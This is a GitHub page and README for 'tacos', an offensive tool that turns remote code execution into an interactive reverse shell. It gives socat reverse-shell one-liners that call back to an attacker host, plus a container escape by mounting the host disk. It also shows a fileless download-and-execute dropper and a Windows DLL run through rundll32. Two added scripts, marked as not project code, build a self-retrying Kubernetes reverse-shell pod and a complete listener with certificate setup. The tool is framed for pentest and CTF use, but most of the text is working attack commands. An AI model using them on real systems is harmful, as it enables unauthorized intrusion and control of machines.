https://github.com/ariary/tacos
🌮 INTERACTIVE reverse shell everywhere! (Particularly digestible with socat multi-handler listener)
ctf golang infosec interactive pentest pentest-tool reverse-shell security socat
Last synced: about 1 year ago
- Host: GitHub
- URL: https://github.com/ariary/tacos
- Owner: ariary
- License: mit
- Created: 2022-02-26T08:48:36.000Z (over 4 years ago)
- Default Branch: main
- Last Pushed: 2023-11-03T14:02:22.000Z (over 2 years ago)
- Last Synced: 2025-04-04T17:11:41.337Z (about 1 year ago)
- Topics: ctf, golang, infosec, interactive, pentest, pentest-tool, reverse-shell, security, socat
- Language: Shell
- Homepage:
- Size: 3.28 MB
- Stars: 29
- Watchers: 1
- Forks: 4
- Open Issues: 5
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# tacos 🌮
(reverse `socat`)
Spawn a pty in your reverse shell to automatically make it interactive for a socat listener.
Fast interactive reverse shell set-up [ 🐳 (container) ](#with-docker-recommended)
All credit for the idea goes to laluka.
Equivalent of:
```shell
socat exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP:PORT],verify=0
```
**Why ?**
* transform an RCE into an interactive reverse shell with almost no prerequisite (only `curl`)
* cross-platform *(Windows is supported, but the shell is not yet interactive there; use the non-Docker setup for Windows targets)*
* tired of hitting ^C and losing your shell?
* too lazy to copy/paste/learn the socat command
* target doesn't have `socat` and you don't want to do [this](#alternatives)
* provide more advanced tty configuration (aliases, etc.)
* easier to obfuscate
## Usage
"I quickly want an interactive reverse shell", take a wrap! 🥙
```shell
# On attacker machine
tmux
wrap --lhost [ATTACKER_IP] # launch the socat listener and print the command to run on the target
# On target
# paste the command printed by wrap: it downloads tacos and launches it to obtain the interactive reverse shell
```
🎁 Bonus n°1: expose the listener to the world wide web
Useful if the target can't reach the attacker machine directly but has internet access.
On the attacker machine, install ngrok or bore and launch your listener:
```shell
wrap -n
```
N.B.: ngrok is more stable than bore for now. Keep in mind that the tunnel endpoint is reachable by anyone on the internet and the listener does not authenticate clients (`verify=0`), so take it down as soon as the shell is in.
### With docker (recommended)
Define the alias *(for simplicity)*:
```shell
alias tacos.container='docker run --net host --rm -it ariary/tacos'
```
Launch multi-handler listener:
```shell
tacos.container [LISTENING_ADDR] [LISTENING_PORT] # [OPTIONAL_TACOS_ARGS]
```
***Notes about `tacos` container security:***
> From a networking point of view, this is the same level of isolation as if the processes were running directly on the host and not in a container. However, in all other ways, such as storage, process namespace, and user namespace, the process is isolated from the host.
🎁 Bonus n°2: tacos reverse shell image
Useful if the target runs Docker, Kubernetes, etc.
On the attacker machine, launch your tacos listener as usual.
On the target:
```shell
docker run --privileged --rm -it ariary/tacos-reverse [TACOS_LISTENER_IP]:[TACOS_LISTENER_PORT]
```
💡: `--privileged` is not mandatory. It is used to allow escaping the container by mounting the host's disk:
```shell
fdisk -l                      # locate the host's root partition (it is not always /dev/sda1)
mkdir /mnt/hostfs
mount /dev/sda1 /mnt/hostfs
```
💡: If you only have write access to a manifest that deploys containers, use the `ariary/tacos-reverse` image with the appropriate arguments.
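For the manifest-only case just above, here is an added example (not part of the tacos project) of a shell helper that emits a Kubernetes Pod manifest running `ariary/tacos-reverse`. It assumes the image's entrypoint takes `LISTENER_IP:PORT` as its only argument, exactly as the `docker run` line shows, and that `privileged: true` is only wanted when you intend the disk-mount escape; the function name `tacos_pod_manifest` and the pod name are my own.

```bash
#!/usr/bin/env bash
# Added example, not tacos project code. Emits a Pod manifest that runs the
# ariary/tacos-reverse image and connects back to LISTENER_IP:PORT.
# Assumption: the image's entrypoint takes the listener address as its only argument.
set -eu

# usage: tacos_pod_manifest <listener_ip:port> [privileged=true|false] [pod_name]
tacos_pod_manifest() {
  local target=$1 privileged=${2:-false} name=${3:-tacos}
  case "$target" in
    *:[0-9]*) ;;   # minimal sanity check: something followed by a numeric port
    *) echo "expected LISTENER_IP:PORT, got '${target}'" >&2; return 1 ;;
  esac
  case "$privileged" in
    true|false) ;;
    *) echo "privileged must be true or false, got '${privileged}'" >&2; return 1 ;;
  esac
  cat <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: ${name}
spec:
  containers:
  - name: ${name}
    image: ariary/tacos-reverse
    args: ["${target}"]
    securityContext:
      privileged: ${privileged}   # same as docker run --privileged; only needed for the host-disk mount escape
EOF
}

# Assumed usage: ./manifest.sh 10.10.14.2:4444 true | kubectl apply -f -
if [ "${1:-}" != "" ]; then
  tacos_pod_manifest "$@"
fi
```

The manifest deliberately leaves `restartPolicy` at its default (`Always`): if your listener is not up yet, the container exits and the kubelet restarts it with backoff, so the pod keeps retrying until the shell lands.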
## Easy install
* Requirements: go, git, tmux *(and ngrok, bore)*
* Install everything: `./install-all-in-one.sh`
You're now good to go:
```shell
tacos.listener
```
## Alternatives
Alternatively, if the target does not have `socat`:
**Host** a [static](https://github.com/minos-org/minos-static/blob/master/static-get) build of the `socat` binary and **download + execute it** using the stealthy [`fileless-xec`](https://github.com/ariary/fileless-xec) dropper:
```shell
# On attacker machine
# get a static socat and expose it
static-get socat
python3 -m http.server 8080
# On target machine
# Use the already downloaded fileless-xec to fetch socat and launch it stealthily (fileless) with these arguments
fileless-xec [ATTACKER_IP]:8080/socat -- exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP]:[SOCAT_LISTENING_PORT],verify=0
```
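Both the "Equivalent of" command at the top of the README and the `fileless-xec` alternative above only show the target side. As an added example (not code from the tacos project), here is the attacker side of that pairing: the throwaway certificate `OPENSSL-LISTEN` needs, the matching listener, and the target one-liner with the placeholders filled in. It assumes `openssl` and `socat` are installed on the attacker machine; the function names, the `setup` subcommand and the `tacos-listener.pem` path are my own.

```bash
#!/usr/bin/env bash
# Added example, not code from the tacos project: attacker side of the socat
# pairing whose target side the README shows. Assumes openssl and socat are installed.
set -eu

# OPENSSL-LISTEN needs a PEM holding private key + certificate. A self-signed
# throwaway cert is enough because the target connects with verify=0.
make_listener_cert() {  # usage: make_listener_cert <out.pem> [cn]
  local out=$1 cn=${2:-tacos} tmp
  tmp=$(mktemp -d)
  openssl req -x509 -newkey rsa:2048 -nodes -days 7 -subj "/CN=${cn}" \
      -keyout "${tmp}/key.pem" -out "${tmp}/cert.pem" 2>/dev/null
  cat "${tmp}/key.pem" "${tmp}/cert.pem" > "${out}"
  chmod 600 "${out}"
  rm -rf "${tmp}"
}

# Listener side. file:<tty>,raw,echo=0 puts OUR terminal in raw mode so ^C, ^Z,
# tab and arrow keys travel to the remote bash instead of killing socat; this is
# the counterpart of pty,setsid,sigint,sane on the target side.
listener_cmd() {  # usage: listener_cmd <lport> <pem> [tty]
  local lport=$1 pem=$2 t=${3:-$(tty)}
  printf 'socat -d -d file:%s,raw,echo=0 OPENSSL-LISTEN:%s,cert=%s,verify=0\n' \
      "${t}" "${lport}" "${pem}"
}

# Target side: the command from the README, with LHOST/LPORT filled in.
target_cmd() {  # usage: target_cmd <lhost> <lport>
  printf "socat exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:%s:%s,verify=0\n" "$1" "$2"
}

# `./listener.sh setup LHOST LPORT` (assumed usage): generate the cert, print the
# one-liner to paste on the target, then run the listener in the foreground.
if [ "${1:-}" = setup ]; then
  : "${2:?usage: setup LHOST LPORT}" "${3:?usage: setup LHOST LPORT}"
  lhost=$2 lport=$3 pem=./tacos-listener.pem
  make_listener_cert "${pem}"
  echo "# run on target:"; target_cmd "${lhost}" "${lport}"
  eval "$(listener_cmd "${lport}" "${pem}")"
fi
```

This is the single-connection form; the tacos listener wraps it in a multi-handler. Note that `verify=0` on both ends means neither side authenticates the other: TLS hides the session from passive sniffing, but anyone who can reach the port can connect to your listener, and an active man-in-the-middle can sit in the session. If you can drop the certificate on the target, replace `verify=0` there with `cafile=` pointing at it.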
### Use a DLL instead of `.exe`
```shell
# On attacker machine:
# edit ./cmd/tacosdll/tacosdll.go and set the listener IP:PORT
$ GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -buildmode=c-shared -ldflags="-w -s -H=windowsgui" -o tacos.dll ./cmd/tacosdll/tacosdll.go
# On target:
> rundll32.exe ./tacos.dll,Tacos
```